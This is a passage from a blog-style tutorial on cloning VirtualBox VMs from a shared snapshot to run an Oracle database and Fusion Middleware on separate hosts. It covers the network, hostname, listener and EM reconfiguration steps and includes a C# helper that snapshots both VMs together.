    2. Clone the existing disk images and point the new VM at the cloned images.
    3. Point the new VM at the existing snapshots.

    #1 is too much like hard work, install OEL twice, install a database again, install FMW again, run RCU again!  Life is too short!

    #2 is probably the safest way of doing things.  VirtualBox allows you to clone a disk image for use in a separate machine.  However this of course duplicates the disk and means that it is now occupying 3 times the space, once for the original disk and twice more for the two clones I would need.

    #3 is the most space-efficient way of doing things.  It does mean however that I can only run the new “cloned” images if I have access to the original image because that is where the base snapshots reside.  However this is not a problem for me as long as I remember to keep all three images together.  So this is the approach we will follow.

    Snapshot, What Snapshot?

    As we are going to create new virtual machines based on existing snapshots we need to figure out which snapshot to use.  We do this by opening the “Media Manager” from within VirtualBox and moving the mouse over the snapshot images until we find the snapshots we want – the snapshot name is identified in the “Attached to:” comment.  In my case I wanted the FMW installed snapshot because that had a database configured for FMW alongside the FMW software.  I made a note of the filename of that snapshot (actually I just noted the first 5 characters as that was all that was needed to uniquely identify the snapshot file). When we create the new machines we will point them at the snapshot filename we have just checked.

    Network or NotWork?

    Because we want the two new machines to communicate with each other when hosted in different physical machines we can’t use the default NAT networking mode without a lot of hassle.  But at the same time we need them to have fixed IP addresses relative to each other so that they can see each other whilst also being able to see the outside world. To achieve all these requirements I created two network adapters for each machine.  Adapter 1 was a standard NAT mapping.  This will allow each machine to get a dynamic IP address (10.0.2.15 by default) that can be used to access the external world through the VBox provided NAT gateway.  This is the same as the existing configuration. The second adapter I created as a bridged adapter.  This gives the virtual machine direct access to the host network card and by using fixed IP addresses each machine can see the other.  It is important to choose fixed IP addresses that are not routable across your internal network so you don’t get any clashes with other machines on your network.
    Of course you could always get proper fixed IP addresses from your network people, but I have several people using my images and as long as I don’t have two instances of the same VM on the same network segment this is easier and avoids reconfiguring the network every time someone wants a copy of my VM.  If it is available I would suggest using the 10.0.3.* network as 10.0.2.* is the default NAT network.  You can check availability by pinging 10.0.3.1 and 10.0.3.2 from your host machine.  If they time out then you are probably safe to use that network.

    Creating the New VMs

    Now that I had collected the data that I needed I went ahead and created the new VMs. When asked for a “Boot Hard Disk” I used the “Choose a virtual hard disk file…” link to find the snapshot I had previously selected and set that to be the existing hard disk.  I chose the previously existing SOA 11.1.1.5 install for both the new DB and FMW machines because that snapshot had the database with the RCU completed that I wanted for my DB machine and it had the SOA software installed which I wanted for my FMW machine. After the initial creation of the virtual machine go into the network settings section and enable a second adapter which will be bridged.  Make a note of the MAC addresses (the last four digits should be sufficient) of the two adapters so that you can later set the bridged adapter to use a fixed IP and the NAT adapter to use DHCP. We are now ready to start the VMs and reconfigure Linux.

    Reconfiguring Linux

    Because I now have two new machines I need to change their network configuration.  In particular I need to change the hostname, update the hosts file and change the network settings.

    Changing the Hostname

    I renamed both hosts by running the hostname command as root:

    hostname vboxfmw.oracle.com

    I also edited the /etc/sysconfig/network file and set the correct hostname in there:

    HOSTNAME=vboxfmw.oracle.com

    Changing the Network Settings

    I needed to change the network configuration to give the bridged network a fixed IP address.  I first explicitly set the MAC addresses of the two adapters, because the order of the virtual adapters in the VirtualBox Manager is not necessarily the same as the order of the adapters in the guest OS.  So I went into the System->Preferences->Network Connections screen and explicitly set the “Device MAC address” for the two adapters. Having correctly mapped the Linux adapters to the VirtualBox adapters I then set the bridged adapter to use fixed IP addressing rather than DHCP.  There is no need for additional routing or default gateways because we expect the two machines to be on the same LAN segment.

    Updating the Hosts File

    Having renamed the machines and reconfigured the network I then updated the /etc/hosts file to refer to the new machine name, added a new line to provide an additional IP address for my server (the new fixed IP address), and added a new line for the fixed IP address of the other virtual machine:

    10.0.3.101      vboxdb.oracle.com       vboxdb  # Added by NetworkManager
    10.0.2.15       vboxdb.oracle.com       vboxdb  # Added by NetworkManager
    10.0.3.102      vboxfmw.oracle.com      vboxfmw # Added by NetworkManager
    127.0.0.1       localhost.localdomain   localhost
    ::1     vboxdb.oracle.com       vboxdb  localhost6.localdomain6 localhost6

    To make sure everything takes effect I restarted the server.
    Reconfiguring the Database on the DB Machine

    Because we changed the hostname, the listener and the EM console no longer start, so I need to modify the listener.ora to use the new hostname and I also need to rebuild the EM configuration because it also relies on the hostname. I edited the $ORACLE_HOME/network/admin/listener.ora and changed the listening address to the new hostname:

    (ADDRESS = (PROTOCOL = TCP)(HOST = vboxdb.oracle.com)(PORT = 1521))

    After changing the listener.ora I was able to start the listener using:

    lsnrctl start

    I also had to reconfigure the EM database control.  I first deconfigured it using the command:

    emca -deconfig dbcontrol db -repos drop

    This drops the repository and removes any existing registered dbcontrols. I then re-configured it using the following command:

    emca -config dbcontrol db -repos create

    This creates the EM repository and then configures and starts dbcontrol. Now my database machine is ready so I can close it down and take a snapshot.

    Disabling the Database on the FMW Machine

    I set up the database to start automatically by creating a service called “dbora”.  On the FMW machine I do not need the database running so I can prevent it auto-starting by running the following command:

    chkconfig --del dbora

    Note that because I am using a snapshot it is not a waste of disk space to have the DB installed but not used.  As long as I don’t run it, it won’t cost me anything. I can now close the FMW machine down and take a snapshot.

    Creating a New Domain

    The FMW machine is now ready to create a new domain.  When creating the domain I can point it at the second machine which is running the database.  I can potentially run these machines on two separate physical machines as long as I have the original virtual machine available to both of the physical machines.

    Gotchas in Snapshotting

    VirtualBox does not support the concept of linked machines in a network like some virtualization technologies, so when creating a snapshot it is a good idea to shut both VMs down and then take a snapshot on both of them.  This is because we want to keep the database in sync with the middleware.  One way to make sure that this happens would be to place all the domain configuration files on the database server via an NFS share; this would mean that all we would need to snapshot would be the database machine because that would hold all the state and configuration.

    The Sky’s the Limit

    We have covered a simple case of having just two machines.  I have a more complicated configuration in which two machines run a RAC database off the same base OS image, and two more machines run a SOA cluster based on the same OS image.  Just remember which machine holds state and what the consequences of taking a snapshot are.
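
    To illustrate the snapshotting gotcha above, here is a minimal sketch of how the coordinated shutdown-and-snapshot of the two machines could be scripted from the host. It is written in C# (to match the other samples in this summary) and simply shells out to VBoxManage; the VM names "vboxdb" and "vboxfmw" are assumptions based on the hostnames used above, and the sketch assumes VBoxManage is on the PATH.

    using System;
    using System.Diagnostics;

    class CoordinatedSnapshot
    {
        // Run a single VBoxManage command and wait for it to complete.
        static void VBoxManage(string arguments)
        {
            var psi = new ProcessStartInfo("VBoxManage", arguments)
            {
                UseShellExecute = false,
                RedirectStandardOutput = true
            };
            using (var p = Process.Start(psi))
            {
                Console.WriteLine(p.StandardOutput.ReadToEnd());
                p.WaitForExit();
                if (p.ExitCode != 0)
                    throw new InvalidOperationException("VBoxManage " + arguments + " failed");
            }
        }

        static void Main()
        {
            // Assumed VM names - change these to match your own VirtualBox machines.
            string[] vms = { "vboxdb", "vboxfmw" };
            string snapshotName = "db-fmw-in-sync-" + DateTime.Now.ToString("yyyyMMdd-HHmm");

            // Ask both guests to shut down cleanly so the DB and FMW snapshots stay consistent.
            foreach (var vm in vms)
                VBoxManage("controlvm \"" + vm + "\" acpipowerbutton");

            Console.WriteLine("Wait until both guests have powered off, then press Enter...");
            Console.ReadLine();

            // Snapshot the two machines as a pair.
            foreach (var vm in vms)
                VBoxManage("snapshot \"" + vm + "\" take \"" + snapshotName + "\"");
        }
    }

    The same pair of VBoxManage commands can of course be run by hand; the point is simply that the two snapshots are taken together, immediately after both guests are down.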

    Read the article
